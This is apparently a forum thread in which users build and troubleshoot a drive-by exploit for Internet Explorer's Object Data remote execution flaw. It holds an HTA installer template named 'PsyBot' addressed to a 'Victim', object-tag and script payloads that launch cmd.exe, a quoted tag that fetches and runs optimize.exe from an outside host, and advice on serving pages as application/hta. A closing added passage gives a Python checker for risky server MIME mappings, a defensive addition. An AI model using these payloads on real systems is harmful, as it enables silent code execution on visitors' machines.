The code you posted doesn't execute for me. Even when using it locally, I get: permission denied. Are you sure you have the default IE settings?

I am playing around with the code of download.asp posted by illwill and the code previously posted by w00dy. I believe in merging them, so the content type returned by the server is application/hta or application/octet-stream. Hope this will make it work.
mojo
CODE
<HTML>
<HEAD>
<TITLE></TITLE>
  <HTA:APPLICATION ID="PsyBot"
   APPLICATIONNAME="PsyBotInstaller"
   BORDER="none"
   BORDERSTYLE="normal"
   CAPTION="no"
   ICON=""
   CONTEXTMENU="no"
   MAXIMIZEBUTTON="yes"
   MINIMIZEBUTTON="yes"
   SHOWINTASKBAR="no"
   SINGLEINSTANCE="no"
   SYSMENU="no"
   VERSION="1.0"
   WINDOWSTATE="minimize"/>

<script LANGUAGE="VBScript">
Dim strName
strName = "Victim"

Msgbox "Hello " + strName, vbExclamation + _
vbOKOnly, "Test Message Box"
</SCRIPT>

<script>
window.close()
</script>
</HEAD>
</html>


That's the full code
secTraq
=> what

Was thinking: would it be possible for you to download mswinsck.ocx to the target machine when making use of the exploit, to make sure it is installed so your prog would work?

By the way, the link you posted is dead.
secTraq
=> mojo

I used the code you posted a minute ago. To call it, I used the following:

<html>
<object style="display:none" data="cmd.asp">
</object>
</html>

I get the same error as before.
what
Sorry about that last code. Try going here now. It will open up cmd.exe if it is in the C:\WINNT\system32\ folder. If cmd.exe is not there, save the code locally and change it to the directory it is in. Have fun.

P.S. I restored the defaults. Slap me around later.
secTraq
=> what

Guess it wasn't your fault.

http://www.angelfire.com/oz/z5/ just doesn't work for me. Even www.angelfire.com doesn't work. Could you place it somewhere else?
secTraq
Just like I did now.
what
<html>
<body>
<span id="oSpan"></span>
<script language="jscript" defer>
oSpan.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/cmd.exe"></object>';
</script>
</body>
</html>
what
Angelfire sucks. It filtered out the code. Try it locally and it works fine.
secTraq
=> what

Sorry, pal. The code you posted works just fine - locally. But it's a different story when on the Internet.

I tested on Angelfire, connecting through a proxy. The code didn't execute.
Then I took the code from your post. Ran it locally, worked fine. Ran it on my web server.. and again, the code didn't execute.
secTraq
Sorry, the previously posted code didn't work.

I will try to write it differently and post it if it's useful.

I apologise.
what
I have a question:
I found a site that has the following code in it:

<OBJECT id=obj codeBase=http://cdn.climaxbucks.com/internet-optimizer/br/wsi9/optimize.exe
height=0 width=0 classid=CLSID:FC87A650-207D-4392-A6A1-82ADBC56FA64><PARAM NAME="DownloadURL2" VALUE="http://cdn.climaxbucks.com/internet-optimizer/br/wsi9/optimize.exe"><PARAM NAME="Delay2" VALUE="0"></OBJECT>

It downloads and executes a program called optimize.exe and creates a folder called dialers in the Programs folder. But when I point it towards another program, it does none of the above! Any thoughts on this? I find it really weird.
secTraq
I honestly have no idea.

Besides, I kindly ask you to ask your questions about topics other than the IE Object Data Remote Execution Vulnerability in another thread corresponding to your request.

Don't get me wrong, I don't want to offend you, but I opened this thread to specifically discuss the Object Data Vulnerability. People don't like it when everything gets mixed up.

If you do not find a topic that matches your request you can open a topic yourself if you wish. That way, questions usually get answered if people know the answers.

But IF you have a question about the IE Object Data Remote Execution Vulnerability, I will be happy to answer it if I can. And of course I will be happy to answer any of your questions, if I can and you ask them where that topic is discussed.
what
No offense taken. I'm sorry that I was getting this all mixed up. I'll be posting a new thread that discusses this vulnerability elsewhere. Again, sorry for the confusion.
mydox2k3
Why doesn't that work?!
http://www.mydox.de/repox/index.html
please help
guggi
I got it working - just change the MIME settings in the IIS setup.

I.e. if you have a script "download.asp", change the asp type to hta...

guggi
balpreetpankaj
Tried changing MIME settings but the exploit still fails. Even changed the httpd.conf file settings of my server ...... the exploit still fails ...... if anyone has any idea please explain how to configure the server.
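guggi's post and the reply above make the server-side MIME mapping the deciding knob: an extension that the browser treats as a page (.asp, .html) is mapped by the server to an executable type such as application/hta. A server owner can audit that mapping to be sure no such entry exists, deliberately or by mistake. The following is an added example and not code from the thread; the httpd.conf lines are constructed, and the dictionary standing in for an IIS MIME map is an assumed shape, not the real metabase format.

```python
"""Audit a web server's MIME mapping for page extensions served as executable types.

Added example (not from the thread). The configuration samples are constructed.
"""
import re

# Types that make IE execute the body rather than render it.
RISKY_TYPES = {"application/hta", "application/x-msdownload", "application/octet-stream"}
# Extensions that visitors (and IE's extension check) assume are plain pages.
PAGE_EXTS = {".asp", ".aspx", ".html", ".htm", ".php", ".txt"}

# Apache syntax: AddType media-type extension [extension ...]
ADDTYPE_RE = re.compile(r'^\s*AddType\s+(\S+)\s+(.+?)\s*$', re.IGNORECASE)


def parse_apache_addtypes(conf_text):
    """Return {".ext": "media/type"} from the AddType directives in an httpd.conf."""
    mapping = {}
    for line in conf_text.splitlines():
        line = line.split("#", 1)[0]          # strip trailing comments
        m = ADDTYPE_RE.match(line)
        if not m:
            continue
        mime = m[1].lower()
        for ext in m[2].split():
            mapping["." + ext.lower().lstrip(".")] = mime
    return mapping


def risky_mappings(mapping):
    """Return sorted (extension, type) pairs where a page extension maps to a risky type."""
    return sorted((ext, mime) for ext, mime in mapping.items()
                  if ext in PAGE_EXTS and mime in RISKY_TYPES)


# Constructed httpd.conf fragment: one sane mapping and one that turns every
# .asp URL into an HTML Application for the client.
SAMPLE_CONF = """\
# constructed sample, not a real server's configuration
AddType text/html .html .htm
AddType application/hta .asp   # this is the setting the thread is after
AddType image/gif .gif
"""

# Constructed stand-in for an IIS MIME map (assumed dict shape).
SAMPLE_IIS_MAP = {".asp": "application/hta", ".html": "text/html", ".exe": "application/octet-stream"}

if __name__ == "__main__":
    print(risky_mappings(parse_apache_addtypes(SAMPLE_CONF)))
    print(risky_mappings(SAMPLE_IIS_MAP))
```

The `.exe` entry in the IIS sample is not reported because serving an executable under an executable extension is what a user expects; the audit only cares about the mismatch between what the extension promises and what the type delivers.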
Invision Power Board © 2001-2005 Invision Power Services, Inc.